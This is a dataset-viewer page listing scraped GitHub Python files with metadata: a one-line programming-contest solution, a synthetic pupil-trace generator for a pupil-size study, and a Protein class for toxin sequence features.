Aasthaengg/IBMdataset | 13,950,053,804,950 | 67c302ef2dcb50ab8710afc15c1175ab2c46e1fd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03778/s090293313.py | 245125398d062db92596d5a96a074f1d464167ae | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | W,a,b=map(int,input().split());print([abs(a-b)-W,0][abs(a-b)<=W]) | UTF-8 | Python | false | false | 65 | py | 202,060 | s090293313.py | 202,055 | 0.569231 | 0.553846 | 0 | 1 | 65 | 65 |
Galactromeda/baseline-pupil-size-study | 1,460,288,909,311 | 24949b3114d935443f812212a2d2f581544ddbe5 | 09dd7af14e88edaffc2980bd6d35e4a08969a507 | /data/analysis/data.py | adb37373f3115459f5932495f8ad2c8135cc705d | []
| no_license | https://github.com/Galactromeda/baseline-pupil-size-study | 7cd9f9fbb909b876820982f4e50221a4d5b4e1a8 | ff7638271659c879c18ede33d5c0ab65293e75ca | refs/heads/master | 2022-01-02T06:28:19.558444 | 2017-11-29T13:21:25 | 2017-11-29T13:21:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
import numpy as np
from datamatrix import cached, DataMatrix, SeriesColumn, IntColumn, io
from analysis.constants import *
a = np.loadtxt('data/trace.txt')
@cached
def generatedata(effectsize=EFFECTSIZE, blinksinbaseline=BLINKSINBASELINE,
**kwargs):
dm = DataMatrix(length=TRACES)
dm.c = IntColumn
dm.c[:TRACES//2] = 1
dm.c[TRACES//2:] = 2
dm.y = SeriesColumn(depth=TRACELEN)
dm.y.setallrows(a)
dm.y += np.random.randint(NOISERANGE[0], NOISERANGE[1], TRACES)
dm.y[TRACES//2:] += np.linspace(0, effectsize, TRACELEN)
# Inroduce blinks
for i, row in enumerate(dm):
blinklen = np.random.randint(BLINKLEN[0], BLINKLEN[1], BLINKS)
if i < blinksinbaseline:
blinkstart = np.array([1])
else:
blinkstart = np.random.randint(BASELINE[1], TRACELEN, BLINKS)
blinkend = blinkstart+blinklen
for start, end in zip(blinkstart, blinkend):
end = min(TRACELEN-1, end)
if end-start < 2 * BLINKMARGIN:
continue
row.y[start:start+BLINKMARGIN] = \
np.linspace(row.y[start-1], 0, BLINKMARGIN)
row.y[end-BLINKMARGIN:end] = \
np.linspace(0, row.y[end], BLINKMARGIN)
row.y[start:end] = np.random.randint(0, 100, end-start)
return dm
def realdata():
dm = io.readpickle('data/real-data.pkl')
# If the buffered DataMatrix still uses a list-style row index, we convert
# it to the new Index object with this hack.
if isinstance(dm._rowid, list):
from datamatrix._datamatrix._index import Index
object.__setattr__(dm, u'_rowid', Index(dm._rowid))
print(len(dm))
return dm
| UTF-8 | Python | false | false | 1,531 | py | 22 | data.py | 8 | 0.702155 | 0.687786 | 0 | 50 | 29.62 | 75 |
christellevs/toxinclass_old | 781,684,085,268 | e19eaec723b2d5c99eb8ea5d4f41e6a57e2b64a4 | 53f79149e1dee73a39dc4a436df2ba155437b337 | /protein.py | 5f0f92cf32d6525b28c67e5fbf29926075aac287 | []
| no_license | https://github.com/christellevs/toxinclass_old | 07b8ec28d974eae6f7beac50de89133511c1c390 | 8b56f85504aba9e13cc997553c85aa2eb2c2590a | refs/heads/master | 2022-11-26T19:58:21.312863 | 2020-08-09T19:28:56 | 2020-08-09T19:28:56 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
# PROTEIN PROCESSING FUNCTIONS START
# -----------------------------------------------------------------------------
# PROTEIN CLASS
class Protein:
def __init__(self, identifier, toxic, length, sequence):
self.identifier = identifier
self.toxic = toxic
self.length = length
self.sequence = sequence
self.seq_dict_raw = {}
self.seq_dict_diff = {}
self.matrix_raw = np.zeros((5, length))
self.matrix_diff = np.zeros((5, length))
def _to_dict(self):
"""
Used to easily transform parsed protein data in Dictionary first, and then DataFrame.
"""
return {'identifier': self.identifier,
'toxic': self.toxic,
'length': self.length,
'sequence': self.sequence,
'matrix_raw': self.matrix_raw,
'matrix_diff': self.seq_dict_diff,
'f1_raw': self.matrix_raw[0],
'f2_raw': self.matrix_raw[1],
'f3_raw': self.matrix_raw[2],
'f4_raw': self.matrix_raw[3],
'f5_raw': self.matrix_raw[4],
'atchley_raw_avg': np.average(self.matrix_raw, axis=0),
'f1_diff': self.matrix_diff[0],
'f2_diff': self.matrix_diff[1],
'f3_diff': self.matrix_diff[2],
'f4_diff': self.matrix_diff[3],
'f5_diff': self.matrix_diff[4],
'atchley_diff_avg': np.average(self.matrix_diff, axis=0)}
# ----------------------------------------------------------------------------- | UTF-8 | Python | false | false | 1,519 | py | 10 | protein.py | 9 | 0.500987 | 0.485188 | 0 | 48 | 30.645833 | 89 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.